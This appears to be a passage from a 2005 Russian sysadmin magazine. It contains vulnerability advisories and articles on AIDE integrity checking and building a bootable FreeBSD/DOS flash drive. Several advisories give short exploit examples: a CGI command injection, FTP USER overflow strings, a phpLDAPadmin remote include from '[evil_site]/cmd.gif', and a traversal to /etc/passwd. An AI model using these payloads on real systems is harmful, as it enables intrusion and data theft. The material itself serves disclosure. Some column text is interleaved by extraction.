http://[target]:8000/cgi-bin/img.pl?f=../bin/ls|
URL производителя: www.barracudanetworks.com.
Решение: Установите последнюю версию (3.1.18) с сайта
производителя.
Выполнение произвольных команд
в Mozilla Firefox
Программа: Mozilla Firefox 1.0.6.
Опасность: Высокая.
Описание: Уязвимость обнаружена в сценарии, который
вызывается для обработки консольных команд, содер-
жащихся в URL. Удаленный пользователь может заста-
вить пользователя нажать на специально сформирован-
ную ссылку во внешнем приложении, которое использу-
ет Firefox в качестве браузера по умолчанию, и выполнить
произвольные команды на системе с привилегиями теку-
щего пользователя. Уязвимость существует только на UNIX-
платформах.
URL производителя: www.mozilla.org/products/firefox.
Решение: Установите последнюю версию с сайта произ-
водителя.
Переполнение буфера при обработке
ARJ-архивов в NOD32
Программа: NOD32 nod32.002 version 1.033 build 1127.
Опасность: Критическая.
Описание: Уязвимость существует из-за ошибки при об-
работке ARJ-архивов, содержащих слишком длинные име-
на файлов. Удачная эксплуатация уязвимости позволит
злоумышленнику выполнить произвольный код на целе-
вой системе.
URL производителя: www.nod32.com.
Решение: Установите исправление с сайта производите-
ля.
Утечка памяти в Apache
Программа: Apache 2.0.х.
Опасность: Средняя.
Описание: Уязвимость существует в функции ap_
byterange_filter() модуля modules/http/http_protocol.c. Удален-
ный пользователь может послать CGI -приложению специ-
ально сформированный HTTP-запрос и вызвать отказ в об-
служивании приложения.
URL производителя: www.apache.org.
Решение: Установите исправление, доступное по SVN:
http://svn.apache.org/viewcvs.cgi?rev=239378&view=rev.
№9, сентябрь 2005
bugtraq
Уязвимость форматной строки
в OpenTTD
Программа: OpenTTD 0.4.0.1.
Опасность: Критическая.
Описание: Уязвимость обнаружена в файлах network.c,
os2.c, strgen/strgen.c, texteff.c, ttd.c и win32.c из-за недоста-
точной обработки входных данных перед вызовом функции
vsprintf(). Удаленный пользователь может послать прило-
жению специально сформированный запрос и вызвать от-
каз в обслуживании или выполнить произвольный код на
целевой системе.
URL производителя: www.openttd.com.
Решение: В настоящее время способов устранения уязви-
мости не существует.
Выполнение произвольного кода
в vxFtpSrv
Программа: vxWeb 0.9.7.
Опасность: Критическая.
Описание: Удаленный пользователь может подключить-
ся к FTP-серверу и послать специально сформирован-
ную команду USER, что приведет к переполнению буфе-
ра и позволит злоумышленнику вызвать отказ в обслужи-
вании или выполнить произвольный код на целевой сис-
теме. Пример:
USER seth@@@@[...]@@@D@@@C@@@B@@@XXXX
URL производителя: www.cam.com/vxftpsrv.html.
Решение: В настоящее время способов устранения уязви-
мости не существует.
Отказ в обслуживании в SlimFTPd
Программа: SlimFTPd 3.17.
Опасность: Средняя.
Описание: Уязвимость существует при обработке команд
FTP USER и PASS. Удаленный пользователь может послать
сервису специально сформированные команды и вызвать
отказ в обслуживании приложения. Пример:
USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n
PASS aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n
URL производителя: www.whitsoftdev.com/slimftpd.
Решение: В настоящее время способов устранения уязви-
мости не существует.
Отказ в обслуживании в Squid
Программа: Squid 2.5.
Опасность: Средняя.
Описание: Уязвимость существует из-за ошибки сегмента-
ции в функции sslConnectTimeout() файла /squid/src/ssl.c. Уда-
ленный пользователь может с помощью специально сфор-
мированного запроса аварийно завершить работу уязвимо-
го сервиса.
URL производителя: www.squid-cache.org.
Решение: Установите исправление с сайта производите-
ля: www.squid-cache.org/…2.5.STABLE10-sslConnectTimeout.
patch.
Составил Александр Антипов
27
 администрирование

УПРАВЛЯЕМ УДАЛЕННЫМИ БАЗАМИ AIDE

ЧАСТЬ II – AIDEStart

РАШИД АЧИЛОВ
Никто его не ждет, хотя постоянно готовится к нему. И вот он наступает – день, когда
сервер взламывается и необходимо проверить, какие файлы подверглись изменениям.
Заветная флэшка с данными контрольных сумм достается из сейфа. Как ей воспользоваться
на взломанной машине, чтобы максимально обезопасить себя от фальсификации результата?

А зачем отдельный
скрипт запуска?
Конечно, наилучшим решением бы-
ла бы загрузка с LiveCD/Flash/другой
системы, монтирование дисков серве-
ра вручную и проверка их в полностью
доверенной системе. Но неприятности
тем и неприятны, что приходят как раз
в тот момент, когда такая система, ес-
ли она есть, неисправна, незаконче-
на или просто физически отсутствует.
Поэтому для запуска проверки непос-
редственно на недостоверной машине
будет использовать AIDEStart.
AIDEstart – второй скрипт, предна-
значенный для управления удаленны-
ми базами AIDE. Его назначение – ис-
пользовать сохраненные базы для про-
верки системы. При этом предполага-
ется, что проверяемая машина недове-
ренная, то есть может содержать пов-
режденные и/или зараженные файлы.
Поэтому дополнительно ко всему про-
чему AIDEstart минимально использует
ее средства, говоря точнее, использу-
ется только ядро системы (/boot/kernel).
Все остальные средства находятся
на съемном носителе, предназначен-
ном для хранения последнего поколе-
ния баз AIDE.
Дополнительно к последнему поко-
лению носитель содержит полный ком-
плект исполняемых файлов для выпол-
нения проверки и всех вспомогатель-
ных операций: chown, chmod, ln и т. д.
Все они сделаны статически собранны-
ми для того, чтобы исключить взаимо-
действие с libc.so. AIDEstart выполняет
обычный комплект операций – иници-
ализация базы, проверка, обновление
базы. Если база обновлялась, то полу-
ченную обновленную базу необходимо
перенести на Flash вручную, для чего
предусмотрена опция командной стро-
ки «не размонтировать Flash по окон-
чании работы».
Полный текст скрипта смотрите на
сайте www.samag.ru, в разделе «Исход-

28

ный код»). Он снабжен достаточно подробными коммента-
риями, а наиболее важные и интересные моменты мы об-
судим далее по ходу статьи.
Готовим носитель для AIDEStart
Для того чтобы Flash, содержащий базы, предварительно
заполненный с помощью AIDEcontrol, можно было исполь-
зовать c AIDEstart, его необходимо предварительно подго-
товить. Эти действия не выполняются AIDEControl, посколь-
ку заранее неизвестно, будет ли использоваться AIDEStart
для проверки или нет. Все действия по подготовке Flash
необходимо проводить на доверенной машине, поскольку
именно этот комплект исполняемых файлов будет считать-
ся эталоном при запуске на недостоверной машине. Flash,
заполненный с помощью AIDEControl, содержит каталоги
с именами, совпадающими с именами машин в файле опи-
сания узлов. Дополнительно необходимо вручную создать
каталоги bin и bin5, в которые поместить соответственно
статически собранные для FreeBSD 4.x и для FreeBSD 5.x
исполняемые файлы: Bzip2, AIDE, camcontrol, chown, chmod,
cp, mv, less, rm, umount, а также собственно aidecontrol,
aidestart и конфигурационный файл aidecontrol.conf.
Для того чтобы собрать все перечисленные выше ис-
полняемые файлы, статически ищем их в дереве исход-
ных текстов системы (или портов для AIDE), и добавляем
в Makefile строчку:
LDADD += -static
после чего запускаем make. После завершения работы make
в каталоге будет находится исполняемый файл, собранный
статически, в чем можно убедиться таким образом:
# ldd chmod
ldd: chmod: not a dynamic executable
Местоположение нужных нам файлов:
! /usr/src/bin/chmod
! /usr/src/bin/cp
! /usr/src/bin/mv
! /usr/src/bin/rm
! /usr/src/sbin/camcontrol
! /usr/src/sbin/umount
! /usr/src/usr.bin/bzip2
! /usr/src/usr.bin/less
! /usr/src/usr.sbin/chown
Опции командной строки
и примеры запуска
Перед началом проверки нам нужно переписать конфигура-
ционный файл aidecontrol.conf на его обычное место – /usr/
local/etc/aidecontrol.conf. Это обычный текстовый файл, за не-
го нечего бояться. Файл можно и не копировать, но тогда при-
дется каждый раз указывать место его размещения.
AIDEStart распознает следующие опции командной
строки:
! -h – краткая справка по опциям (без примеров).
! -i – инициализировать базы AIDE (выполняется коман-
да aide --init).
№9, сентябрь 2005
администрирование
! -c – проверить систему по последней базе (выполняет-
ся команда aide --check).
! -u – обновить последнюю базу данных (выполняется ко-
манда aide --update).
! -m – сравнить базы данных (выполняется команда aide
--compare).
! -f – указывает имя и путь к конфигурационному файлу
(по умолчанию /usr/local/etc/aidecontrol.conf).
! -n – не размонтировать Flash после окончания работы.
Эта опция предназначена для команд, изменяющих ба-
зу. AIDEStart сам не копирует созданную/обновленную
базу с компьютера на Flash, и это сделано намеренно.
Вы сами должны решить, стоит ли заменять последнюю
копию базы на Flash, на новую или нет.
! -5 – скрипт запускается на FreeBSD 5.x (по умолчанию
предполагается 4.x).
Таким образом:
# aidestart -i
инициализирует базу по умолчанию (/var/db/aide/aide.db, ес-
ли в конфигурационном файле не указано иное).
# aidestart -u -n
проверит систему по последней базе с ее одновременным
обновлением, выведет отчет с помощью less и переимену-
ет «новую» базу (aide.db.new) в «старую» (aide.db). После
выполнения этой операции Flash не будет размонтирова-
на для возможной перезаписи «старой» базы.
#aidestart -m -f /tmp/blabla.conf -5
сравнит «старую» базу, загруженную с Flash, и «новую»
(aide.db.new), созданную, возможно, в другое время, исполь-
зуя конфигурационный файл /tmp/blabla.conf и учитывая то,
что запускаться скрипт будет на FreeBSD 5.x.
Загрузка базы AIDE для проверки
Эта функция разбирается просто для того, чтобы показать,
что скрипт действительно не использует никаких систем-
ных исполняемых файлов для работы – только свои собс-
твенные.
loadbase()
{
$aidepath/rm -f $adbnam
$aidepath/cp $aidebase/$adbnam.bz2 $adbnam.bz2
$aidepath/chown $abowner:$abgroup $adbnam.bz2
$aidepath/chmod $abmode $adbnam.bz2
$aidepath/bzip2 -d -q $adbnam.bz2
}
Выполнение операции
Перед тем как скопировать базу с Flash-диска, скрипт
проверяет параметр starthost из конфигурационного фай-
ла – его значение должно быть установлено равным тому
имени, что было задано для данного компьютера в фай-
29
 администрирование
ле описания узлов, использованного
в AIDEcontrol. Если значение парамет-
ра не изменено (а по умолчанию оно
равно «--SET-HERE--»), скрипт прекра-
щает работу.
Затем скрипт пытается смонтиро-
вать Flash с последним поколением
баз. Для этого должны быть выполне-
ны все необходимые настройки, опи-
санные в [1]. Если все сделано пра-
вильно, Flash должен монтироваться
сразу же после установки. Это очень
просто проверить – достаточно вста-
вить Flash, и он должен смонтировать-
ся в точку /mnt/umass (или любую дру-
гую, заданную в /etc/fstab). Так же, как
и в AIDEStart, монтирование происходит
в бесконечном цикле ожидания – пока
нужное устройство не найдено среди
смонтированных, можно будет увидеть
только запрос на установку Flash.
После успешного монтирования
Flash выполняется запрошенная опе-
рация. Для операции инициализации
базы загрузка с Flash не производит-
ся, иначе последняя база загружает-
ся с Flash в стандартное расположе-
ние и выполняется соответствующая
операция. После выполнения опера-
ции можно просмотреть отчет (он отоб-
ражается автоматически с помощью
30
less), после чего «новая» база будет
переименована в «старую» (для init или
update), у нее будет изменен владелец
и права доступа на указанные в конфи-
гурационном файле.
Последнее, что сделает скрипт, –
это размонтирует Flash, если не за-
дан ключ, запрещающий это. Перед
тем как размонтировать, в /tmp будут
сброшены исполняемые файлы umount
и camcontrol, потому что Flash будет
недоступна, а пользоваться недове-
ренными исполняемыми файлами не-
льзя. Сброшенные umount и camcontrol
размонтируют Flash и остановят ус-
тройство (скрипт анализирует спи-
сок устройств и выбирает то, которое
было на нужной нам точке монтиро-
вания). Остановка устройства нужна
главным образом для того, чтобы по-
гасить индикатор готовности на Flash,
хотя это работает не на всех устройс-
твах. После чего и собственно umount
и camcontrol будут тоже удалены.
Возможные ошибки
Наиболее сложной частью здесь яв-
ляется настройка USB для того, что-
бы монтирование Flash происходило
автоматически. Об этом подробно рас-
сказано в [1].
Если монтирование Flash проходит
успешно, то ошибиться практически не-
где. Единственная возможность – ука-
зать неверные пути в aidecontrol.conf.
Пожалуйста, проверьте правильность
написания, существования и наличия
прав на данные каталоги (Кто сказал,
что root может все? Попробуйте-ка уда-
лить каталог с атрибутом schg при kern.
securelevel=2 и выше).
Заключение
Так все-таки можно обойтись без дан-
ного скрипта или нет? Конечно, можно,
если все выполняемые здесь операции
делать руками, помнить правильную
последовательность и не ошибать-
ся в ней. Данный скрипт – всего лишь
«малая механизация» для того, чтобы
освободить свою память для решения
более важных задач. Ну и, разумеет-
ся, не следует оставлять Flash с база-
ми где попало, в том числе и в рабо-
чем столе. Например, я постоянно но-
шу ее при себе.
Литература:
1. Ачилов Р. Управляем удаленными
базами AIDE. – Журнал «Систем-
ный администратор», №8, август
2005 г. – 48-53 с.

Обход ограничений безопасности
в опции SSLVerifyClient в mod_ssl
Программа: mod_ssl версии до 2.8.24.
Опасность: Средняя.
Описание: Уязвимость существует в реализации аутен-
тификации, основанной на сертификатах. Если значение
опции SSLVerifyClient установлено в optional в глобальной
конфигурации виртуального хоста, злоумышленник может
обойти процесс аутентификации и получить неавторизо-
ванный доступ к ресурсам веб-сайта.
URL производителя: www.modssl.org.
Решение: Установите последнюю версию с сайта произ-
водителя: www.modssl.org/source/mod_ssl-2.8.24-1.3.33.tar.
gz.
Уязвимость состояния операции в Squid
Программа: Squid 2.5 и более ранние версии.
Опасность: Средняя.
Описание: Уязвимость обнаружена при обработке оста-
новленных запросов в файле store.c. При определенных об-
стоятельствах удаленный пользователь может прервать за-
прос и вызвать отказ в обслуживании приложения с ошиб-
кой «e->store_status == STORE_PENDING».
URL производителя: www.squid-cache.org.
Решение: Установите исправление с сайта произво-
дителя: http://www.squid-cache.org/Versions/v2/2.5/bugs/
squid-2.5.STABLE10-STORE_PENDING.patch.
Отказ в обслуживании
в Symantec Brightmail AntiSpam
Программа: Symantec Brightmail AntiSpam 6.0.2.
Опасность: Средняя.
Описание: Удаленный пользователь может создать e-mail-
сообщение, содержащее разветвленный zip-файл, что при-
ведет к большому потреблению ресурсов для сканирова-
ния сообщения.
Удаленный пользователь может послать специально
сформированное сообщение, содержащее объект winmail.
dat внутри MIME-файла, и вызвать отказ в обслуживании
приложения.
URL производителя: www.symantec.com.
Решение: Установите исправление с сайта производите-
ля: ftp://ftp.symantec.com/public/english_us_canada/products/
sba/sba_60x/updates/patch157.zip.
Отказ в обслуживании в Snort
Программа: Snort 2.4.0 и более ранние версии.
Опасность: Средняя.
О п и с а н и е : Уя з в и м о с т ь с у щ е с т в у е т в ф у н к ц и и
PrintTcpOptions() файла snort-2.4.0/src/log.c из-за ошибки
в нулевом указателе разыменования. Удаленный пользо-
ватель может послать приложению TCP/IP-пакет со специ-
ально сформированной опцией TCP SACK и вызвать отказ
в обслуживании. Успешная эксплуатация уязвимости тре-
бует, чтобы Snort был запущен с ключом -v.
URL производителя: www.snort.org.
Решение: Установите последнюю версию (2.4.1), доступ-
ную по CVS.
№9, сентябрь 2005
bugtraq
Множественные уязвимости
в FreeRADIUS
Программа: FreeRADIUS 1.0.4.
Опасность: Средняя.
Описание: 1. Ошибка при обработке переменных окруже-
ния в функции radius_exec_program() файла exec.c может
вызвать переполнение стека и вызвать отказ в обслужи-
вании системы.
2. Обнаружены ошибки Off-by-one в файлах token.c и sql_
unixodbc.c. Удаленный пользователь может вызвать отказ
в обслуживании приложения.
3. Переполнение стека в модуле xlat.c при обработке
ответов от сервера может позволить злоумышленнику вы-
звать отказ в обслуживании.
4. Утечка памяти возможна из-за ошибки в функции
strftime() в файле xlat.c.
5. Раскрытие данных Ldap в модуле rlm_ldap.c позволя-
ет злоумышленнику с помощью специально сформирован-
ного LDAP-запроса получить доступ к потенциально важ-
ной информации.
URL производителя: www.freeradius.org.
Решение: Установите исправление, доступное по cvs.
PHP-инклудинг в phpLDAPadmin
Программа: phpLDAPadmin 0.9.6 – 0.9.7/alpha5.
Опасность: Критическая.
Описание: Уязвимость позволяет удаленному пользова-
телю с помощью специально сформированного URL вы-
полнить произвольный PHP-сценарий на целевой системе
с привилегиями веб-сервера. Пример:
http://[target]/[path]/phpldapadmin/welcome.php?
custom _ welcome _ page=http ://[evil _ site]/cmd.gif
Удаленный пользователь может просмотреть произ-
вольные файлы на системе с помощью символов обхода
каталога. Пример:
http://[target]/[path]/phpldapadmin/welcome.php?
custom _ welcome _ page=../../../../../../../../etc/passwd
Удаленный пользователь может также выполнить про-
извольный HTML-сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
URL производителя: www.phpldapadmin.sourceforge.net.
Решение: В настоящее время способов устранения уязви-
мости не существует.
Отказ в обслуживании
в Microsoft Exchange Server 2003
Программа: Microsoft Exchange Server 2003.
Опасность: Средняя.
Описание: Уязвимость вызвана неопределенной ошиб-
кой при обработке запросов для просмотра публичных па-
пок. Удаленный пользователь может с помощью специаль-
но сформированного IMAP4-запроса аварийно завершить
службу Microsoft Exchange Information Store (Store.exe).
URL производителя: www.microsoft.com.
Решение: Установите исправление с сайта производите-
ля.
Составил Александр Антипов
31
 администрирование

СОЗДАЕМ ЗАГРУЖАЕМЫЙ FLASH-ДИСК

С Free
reeBSD
BSD И DOS
ЧАСТЬ I

РАШИД АЧИЛОВ
Начальство признало необходимость установки нового сервера, подписало счета, выделило
деньги – вот он, красавец! Вот только... как на него поставить FreeBSD? Дисковода нет,
CD-ROM отсутствует, из стойки не вытащить... Да и оборудование бы проверить.
Остается одно – загрузить с USB.

Наша цель – загрузиться
с Flash
Поначалу задача казалась настоль-
ко несложной, что даже мысли писать
об этом не возникало. Ну подумаешь,
поставить систему на компьютер, в ко-
тором нет ни дисковода гибких дисков,
ни CD-ROM, а жесткие диски в нем ус-
тановлены вертикально, чтобы боль-
ше поместилось. К тому же он будет
постоянно установлен в стойке и вы-
таскивать его надолго оттуда нельзя
(а иначе что это за сервер?). Ведь сов-
ременные компьютеры умеют грузить-
ся с Flash. Нет такой Flash? Ну что ж,
надо сделать... И не забыть при этом,
что временами возникает необходи-
мость тестирования жестких дисков,
сетевых карт, xDSL-модемов и прочего
оборудования на самом нижнем уров-
не. А какая операционная система поз-
волит это сделать? Правильно, только
MS-DOS. Нужен непосредственный
доступ к оборудованию. В *NIX такое
может быть обеспечено драйвером,
но где вы видели драйвер, который
позволяет напрямую пропустить ко-
манды канала? Значит, надо предус-
мотреть на Flash-диске наличие MS-
DOS, а также менеджер загрузок, ко-
торый позволил бы выбрать при старте
одну из этих систем. Причем это дол-
жен быть не стандартный для FreeBSD

32

BootEasy, который своим аскетичным внешним видом спо-
собен испугать кого угодно.
Это не Frenzy. И не FreeSBIE.
Это FlashBOOT!
Сообщество эхо-конференции RU.UNIX.BSD откровенно не-
доумевало, когда я сказал о том, что собираюсь сделать.
Отзывы были примерно такими: «это все ерунда, уже есть
Frenzy, которая умеет грузиться с Flash, уже есть FreeSBIE,
которая с версии 2.0 сможет загружаться с любого носите-
ля, а DOS – так он вообще никому уже не нужен». Любопыт-
но, что про то, что DOS никому не нужен, говорили люди,
для которых замена жесткого диска, как правило, дешевле
ремонта. Или же люди, не представляющие себе, что можно
сделать с помощью, например, MHDD. На что я неизменно
отвечал, что этот проект разрабатываю для себя, если ко-
му-то он понравится – хорошо, нет – и не надо.
Итак, что же входит в состав Flash-BOOT и чем он отли-
чается от Frenzy (FreeSBIE в настоящий момент еще не уме-
ет грузиться с Flash и, по причинам, приведенным выше,
не рассматривается).
«Frenzy – это «портативный инструмент системного ад-
министратора», LiveCD на базе ОС FreeBSD, загрузившись
с которого, администратор получает полностью работоспо-
собную систему с набором программного обеспечения для
настройки, проверки и анализа сети, тестирования ком-
пьютерного «железа» и ряда других задач» – это описа-
ние Frenzy взято с [1]. После ознакомления со списком про-
грамм, входящих во Frenzy, я сразу же задался вопросом:
«А для чего все это?». После некоторого более присталь-
ного изучения возник и ответ: «Так это же LiveCD на Flash,
а вовсе не то, что мне нужно!»
Какие цели преследует Frenzy? Как и любой другой
LiveCD – загрузиться и предоставить пользователю макси-
мально возможное количество программ для работы. Отсю-
да и графическая среда, и почтовые клиенты, и разнообраз-
ные коммуникаторы – список программ, входящих во Frenzy,
достаточно впечатляющий. Несомненно, это все нужные ве-
щи. Но как с их помощью проверить целостность файловой
базы? AIDE, которая по моему мнению, нужнее, чем все гра-
фические менеджеры, вместе взятые, я не нашел. Наличие
программ стандартной поставки (fdisk, disklabel, sysinstall,
etc.) на сайте не оговаривается, дистрибутив мне скачивать
не захотелось – жаль тратить «на посмотреть» 600 Мб вов-
се не бесплатного трафика. Скорее всего их нет – в состав
Frenzy входит множество программ, нужно же где-то взять
для них место. То есть установить FreeBSD на новый ком-
пьютер с его помощью невозможно. Наличие стандартной
документации на программы (все мы люди, ну вот вылете-
ли у меня из головы ключи некоей программы – где пос-
мотреть, если сервера нет, связи нет и спросить не у кого?)
опять же не оговаривается, скорее всего их тоже нет. Со-
здание собственного дистрибутива Frenzy – вещь отнюдь
не тривиальная, автор об этом честно предупреждает, под
FreeBSD 5.х создать дистрибутив Frenzy невозможно, по-
тому что используется burncd для записи образа.
Все вышеприведенное было сказано вовсе не с целью
как-то преуменьшить заслуги автора Frenzy – «ведь если
звезды зажигают, значит, это кому-нибудь нужно». Цель вы-
№9, сентябрь 2005
администрирование
шеизложенного – показать, что Frenzy и FlashBOOT созда-
вались для решения разных задач. FlashBOOT – это не ком-
плект программ для работы, это комплект аварийно-вос-
становительный с возможностью установки системы на но-
вый компьютер, что-то среднее между Install и Fixit-дисками
из стандартной поставки FreeBSD. FlashBOOT в значитель-
но большей мере рассчитан на тех, кто понимает, что он де-
лает, потому что установка системы в нем производится
не как обычно, «не выходя из sysinstall», а по большей час-
ти ручным вводом команд. Да, это не модно. Да, это слож-
нее, чем обычно. Но это работает. В нем нет и скорее всего
никогда не будет никаких графических сред. В нем есть то,
что необходимо для установки FreeBSD на новый компью-
тер, для тестирования аппаратной части, для проверки фай-
ловой целостности... и все, что входит в базовую поставку
стандартной системы, перечислять здесь не имеет никако-
го смысла. А также все, что можно запустить в DOS.
Итак, что же входит во FlashBOOT?
Состав FlashBOOT
Отчет fdisk:
# fdisk /dev/da0
******* Working on device /dev/da0 *******
parameters extracted from in-core disklabel are:
cylinders=246 heads=64 sectors/track=32 (2048 blks/cyl)
parameters to be used for BIOS calculations are:
cylinders=246 heads=64 sectors/track=32 (2048 blks/cyl)
Media sector size is 512
Warning: BIOS sector numbering starts with sector 1
Information from DOS bootblock is:
The data for partition 1 is:
sysid 4 (0x04),(Primary DOS with 16 bit FAT (< 32MB))
start 63, size 48132 (23 Meg), flag 0
beg: cyl 0/ head 1/ sector 1;
end: cyl 47/ head 12/ sector 63
The data for partition 2 is:
sysid 165 (0xa5),(FreeBSD/NetBSD/386BSD)
start 48195, size 455612 (222 Meg), flag 80 (active)
beg: cyl 47/ head 13/ sector 1;
end: cyl 499/ head 12/ sector 59
The data for partition 3 is:
<UNUSED>
The data for partition 4 is:
<UNUSED>
В качестве менеджера загрузки операционных систем
используется программа, функционирующая под DOS –
xFDisk, взятая с [2]. Программа была выбрана после долгой
процедуры отбора менеджеров загрузки, способных:
! Загрузиться с Flash самим. Как это ни странно, это ока-
залось непосильной задачей для SyMon [3], Ranish
Partition Manager (имеет встроенный менеджер загру-
зок [4]), XOSL [5] и MATTSoft Boot Manager [6].
! Загрузить FreeBSD. Это оказалось не под силу симпа-
тичному, но, увы, бесполезному zBoot [7].
Другими прошедшими тест на возможность использо-
вания для Flash оказались BootEasy и ExtIPL. Это неудиви-
тельно, потому что BootEasy – стандартный менеджер за-
грузок для FreeBSD, а ExtIPL присутствует в портах (sysutils/
extipl). Почему я использовал менеджер загрузок, настра-
иваемый под DOS, а не под FreeBSD (GRUB, например)?
GRUB был установлен на первые версии FlashBOOT, но пос-
33
 администрирование
ле возникновения странных проблем, когда он неожидан-
но отказался ставиться в область загрузки, был заменен
на xFDisk, тем более что переставить DOS значительно про-
ще, чем FreeBSD (рис. 1).

Раздел DOS
Стандартный загружаемый раздел формата FAT16 с уста-
новленной операционной системой MS-DOS 6.22. Опера-
ционная система размещена в каталоге DOS. Установле-
но следующее программное обеспечение:
! Dos Navigator (C:\DN149).
! Multi-Edit 7.0 (C:\ME70).
! Norton Utilites 8.0 (C:\NORTON8).
! Множество различных программ, работающих под DOS, Рисунок 1. Внешний вид менеджера загрузок xFDisk
разнообразного назначения. Архиваторы, конвертеры,
отладчики, упаковщики, драйвера оборудования – все, ! pkgconfig 0.17.2 (требуется для glib, mc)
что может осесть на диске после более чем пяти лет ра- ! libiconv 1.9.2 (требуется для gettext, glib, mc, libgcrypt,
боты под DOS. (C:\UTILS и подкаталоги в нем). libgpg-error)
! rar 3.41
Создано множество вариантов загрузки – загрузка ! gettext 0.14.5 (требуется для glib, mc, libgcrypt, libgpg-
EMM, загрузка драйвера звуковой карты, загрузка драй- error)
вера CD-ROM и загрузка драйвера USB (да-да, это есть!) ! glib 2.6.5 (требуется для mc)
во всех возможных сочетаниях. Оболочка Dos Navigator ! unzip 5.52
установлена вместе с большой (порядка 60) коллекцией ! nmap 3.81
программ просмотра файлов различного формата. Запи- ! libslang 1.4.9 (требуется для mc)
сана программа тестирования дисков на нижнем уровне ! ncftp 3.1.9
MHDD. Все это покрывает практически 90% задач, для ко- ! grub 0.97
торых используется DOS, а для остального всегда есть сво-
бодное место. Для экономии места удалены все каталоги языковых
настроек (удалено все, не относящееся к русскому или анг-
Раздел FreeBSD лийскому). Это /usr/share/locale, /usr/local/share/locale. Почи-
Отчет disklabel: щены все каталоги поддержки национальных языков (/usr/
share/nls, /usr/local/share/nls). Удалены каталоги с докумен-
# disklabel da0s2 тацией о системе /usr/share/doc, /usr/share/info.
# /dev/da0s2:
Скачать образ Flash, упакованный RAR 3.41, можно
8 partitions:
# size offset fstype [fsize bsize bps/cpg] здесь – http://support.spectrum.ru/freebsd/dosandfreebsd54.rar.
a: 455596
c: 455612
16
0
4.2BSD
unused
2048 16384 28480
0 0 # "raw" part, don't edit
Контрольная сумма MD5 равна: MD5 (dosandfreebsd54.rar) =
732ada4b8bc98a0251cfe3682c160a62.
Отчет df: Ядро собрано с оптимизацией под Pentium III (на более
Filesystem 1K-blocks Used Avail Capacity Mounted on
старых компьютерах нет возможности загружаться с USB).
/dev/da0s1 23863 19237 4626 81% /mnt/umass/dos Зарегистрирован только один пользователь root, который
/dev/da0s2a 220420 166856 35932 82% /mnt/umass/ufs может заходить в систему без запроса пароля. Это было
Здесь разделы Flash-диска смонтированы на другом настроено с помощью PAM.
компьютере в точки монтирования /mnt/umass/dos и /mnt/ Сетевая карта при старте системы не настраивает-
umass/ufs соответственно. ся, это необходимо каждый раз делать вручную. Сделано
Стандартный загружаемый раздел FreeBSD. Система это специально, потому что FlashBOOT – дистрибутив ава-
устанавливалась при помощи /stand/sysinstall и частично рийно-восстановительный, и если он используется – значит
вручную, без применения каких-либо скриптов. Установ- произошло что-то нестандартное. По этой же причине не за-
лены стандартные пакеты base, compat4x и man. Вручную пускается ни один сетевой сервис. Впрочем, никто не поме-
добавлены следующие пакеты (все устанавливалось че- шает вам перенастроить систему по своему вкусу.
рез порты):
! pcre 5.0 (требуется для nmap) Создание
! libgpg-error 1.0 (требуется для libgcrypt) Разнообразных ошибок при попытках создания двух раз-
! mc 4.6.0 делов и менеджера загрузок было столько, что я просто
! mhash 0.9.1 (требуется для aide) не знал, за какую из них браться. Первоначальный порядок
! aide 0.10 действий при создании Flash был примерно такой:
! yui 3.1.15 ! Создать раздел FAT16 и отформатировать его.
! libgcrypt 1.2.1 ! Установить загрузчик и ядро операционной системы
! SSH2 3.2.9.1 DOS.

34

! Установить менеджер загрузок.
! Создать раздел (слайс) FreeBSD, корневой раздел фай-
ловой системы и отформатировать его (асинхронное об-
новление должно быть отключено – мигнёт свет при за-
грузке, и прощайте внесенные изменения.
! Проверить, что загружается и DOS, и FreeBSD.
! Установить и настроить программное обеспечение обе-
их систем.
Несложный план, скажете вы. Не тут-то было. Пробле-
мы были во всем, от установки менеджера загрузок до на-
стройки софта. Больше всего проблем, конечно же, вызва-
ло создание раздела FAT16 – ни тривиальными, ни нетри-
виальными средствами сделать это сначала просто не уда-
валось, потому что:
! с FAT-раздела, создаваемого во FreeBSD через /stand/
sysinstall, а также через «fdisk -e», DOS грузиться кате-
горически отказывался. Да, его можно было увидеть
через USB for DOS при загрузке с дискеты, но коман-
да sys c: завершалась аварийно. После нескольких по-
пыток я отказался от практики создания разделов FAT
во FreeBSD, так как заподозрил, что раздел FAT созда-
ется «немножко не такой», каким хотел бы его видеть
загрузчик BIOS.
! Flash 2.0 объемом 256 Мб, на которой предполагалось
все это создать (Kingston DataTraveler 2.0), в Windows
определяется как съемный носитель и соответственно
не может быть размечен средствами программ работы
с разделами жесткого диска типа Acronis Disk Director
или Partition Magic.
Выход из положения был найден, когда я обнаружил,
что другая, более старая Flash 1.1 128 Мб (Seitek BAR) оп-
ределяется Windows как жесткий диск. С помощью Acronis
Disk Director на этой Flash был создан раздел FAT16 разме-
ром 23 Мб, DOS загружен с дискеты с драйверами USB for
DOS и вновь созданный раздел был сделан загрузочным
командой «sys a: c:».
После этого я убедился, что DOS с этой Flash загружа-
ется, и скопировал ее начало (загрузчик, таблицу разделов,
FAT и только что созданные системные файлы). Копиро-
вать все 23 Мб не было необходимости, поскольку нужная
информация о файловой системе сосредоточена исключи-
тельно в FAT. Образ был создан следующей командой:
# dd if=/dev/da0 of=seitek2000.dsk count=2000
Файл образа, упакованный RAR 3.41, можно скачать
по ссылке [8].
После его записи на Flash командой, например:
# dd if=seitek2000.dsk of=/dev/da0
получится Flash с одним разделом DOS, в котором ничего
нет, кроме ядра системы – io.sys, msdos.sys и command.com.
Менеджера разделов тоже нет. Надо сказать, что в процес-
се создания Flash именно этот файл не раз оказывал мне
неоценимую помощь – неоднократно приходилось возвра-
щаться к началу и заново разворачивать его на Flash. От-
№9, сентябрь 2005
администрирование
чет fdisk по этому файлу можно скачать по ссылке [9]. Об-
ратите внимание, что значения начала и конца раздела вы-
ражены другими цифрами, хотя обьем тот же самый. Ни-
же приводятся данные о разделе, созданном с помощью
Acronis Disk Directory Suite в Windows.
The data for partition 1 is:
sysid 4 (0x04),(Primary DOS with 16 bit FAT (< 32MB))
start 63, size 48132 (23 Meg), flag 80 (active)
beg: cyl 0/ head 1/ sector 1;
end: cyl 2/ head 254/ sector 63
Следующее действие заключалось в подборе менедже-
ра загрузок, такого, чтобы он мог загрузиться с Flash сам
и загрузить оттуда FreeBSD. В начале статьи уже перечис-
лены менеджеры загрузок, которые были мной испытаны
и проверка которых дала отрицательный результат. Пер-
